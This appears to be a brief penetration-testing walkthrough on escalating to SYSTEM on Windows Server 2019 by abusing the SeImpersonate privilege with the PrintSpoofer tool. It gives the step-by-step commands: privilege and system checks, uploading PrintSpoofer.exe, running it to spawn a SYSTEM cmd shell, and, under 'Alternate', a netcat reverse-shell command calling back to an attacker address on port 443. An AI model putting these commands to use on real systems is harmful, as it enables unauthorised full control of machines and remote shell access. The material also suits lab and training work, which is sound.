PrintSpoofer

Windows Privilege Escalation

View on GitHub

PrintSpoofer

Rogue-Potato abused SeImpersonate privilege to get execution as SYSTEM for Windows Server 2019. PrintSpoofer can be an alternate to Rogue-Potato. You can exploit SeImpersonate privilege on Windows Server 2019 with PrintSpoofer and it’s so easy.

Exploitation

whomai /priv

OnPaste 20220611-195845

Check for systeminfo

OnPaste 20220611-200054

The OS is Microsoft Windows server 2019 and x64-bit arch. SeImpersonate privilege is Enabled. With this information it seems that host is likey vulnerable to PrintSpoofer.

Upload the PrintSpoofer to target machine.

OnPaste 20220611-200357

Execute the exploit.

.\PrintSpoofer.exe -i -c cmd

OnPaste 20220611-200624

We’re SYSTEM now!

Alternate

We can also get a reverse shell if we want. Execute nc binary with PrintSpoofer.

.\PrintSpoofer.exe -c ".\nc.exe 10.11.x.x 443 -e cmd"